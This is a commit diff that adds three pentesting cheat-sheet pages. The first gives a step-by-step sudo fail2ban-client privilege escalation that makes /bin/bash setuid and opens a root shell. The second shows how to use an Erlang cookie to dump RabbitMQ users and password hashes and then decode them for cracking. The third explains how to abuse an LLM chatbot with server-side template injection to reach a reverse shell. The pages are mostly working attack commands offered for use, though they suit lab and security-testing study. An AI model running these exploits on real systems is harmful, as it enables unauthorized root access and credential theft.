updated

Author: hdks-bug

src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-client-privilege-escalation.md

@@ -0,0 +1,37 @@
+---
+title: Sudo Fail2ban-Client Privilege Escalation
+description: Sudo fail2ban-client command might be vulnerable to privilege escalation (PrivEsc).
+tags:
+    - Privilege Escalation
+refs:
+date: 2025-03-12
+draft: false
+---
+
+## Investigation
+
+```bash
+sudo -l
+
+# Output:
+(ALL) NOPASSWD: /usr/bin/fail2ban-client
+```
+
+If we can execute `fail2ban-client` command as root, we may be able to escalate privilege and gain a root shell.
+
+## Exploit
+
+```bash
+# Get jail list
+sudo /usr/bin/fail2ban-client status
+# Choose one of the jails from the "Jail list" in the output.
+sudo /usr/bin/fail2ban-client get <JAIL> actions
+# Create a new action with arbitrary name (e.g. "evil")
+sudo /usr/bin/fail2ban-client set <JAIL> addaction evil
+# Set payload to actionban
+sudo /usr/bin/fail2ban-client set <JAIL> action evil actionban "chmod +s /bin/bash"
+# Trigger the action
+sudo /usr/bin/fail2ban-client set <JAIL> banip 1.2.3.5
+# Now we gain a root
+/bin/bash -p
+```

src/exploit/network/protocol/amqp-pentesting.md

@@ -0,0 +1,46 @@
+---
+title: AMQP (Advanced Message Queuing Protocol)
+description: AMQP is an open standard application layer protocol. Defaults Ports are 5671, 5672.
+tags:
+    - Network
+refs:
+date: 2025-03-12
+draft: false
+---
+
+## Connect
+
+We can use `rabbitmqctl` command for interacting with the AMQP server from remote machine.  
+If it does not exist on your machine, install it with the following command:
+
+```bash
+sudo apt install rabbitmq-server
+```
+
+Now we can use it.
+
+```bash
+# Get status
+sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> status
+
+# Get all users
+sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> list_users
+
+# Dump user password hash (format: Base64 encoded RabbitMQ SHA-256)
+sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> export_definitions /tmp/output.json
+```
+
+## Get Password
+
+If we get the password hash after the `rabbitmqctl export_definitions` command, we can extract the password from it. The hash is Base64-encoded and the format is as below by default:
+
+```bash
+BASE64(4_BYTE_SALT + SHA256(4_BYTE_SALT + PASSWORD))
+```
+
+So extract the SHA256 hash with the following command:
+
+```bash
+# cut -c9-: Output from the 9th character (to extract the first 4 bytes)
+echo -n '<password_hash>' | base64 -d | xxd -p -c 1000 | cut -c9-
+```

src/exploit/web/llm-chatbot-pentesting.md

@@ -0,0 +1,22 @@
+---
+title: LLM Chatbot Pentesting
+description: An LLM chatbot in a web application can be abused with some exploit techniques.
+tags:
+    - LLM
+    - Web
+refs:
+date: 2025-03-12
+draft: false
+---
+
+## SSTI
+
+If the chatbot reflects our prompt in the response, we might be able to abuse it with SSTI. For example,
+
+```txt
+Prompt: How are you? {{ 2*3 }}
+
+Response: I will answer your question "How are you? 6". I'm good, thanks! How about you?
+```
+
+If it works, we can achieve reverse shell.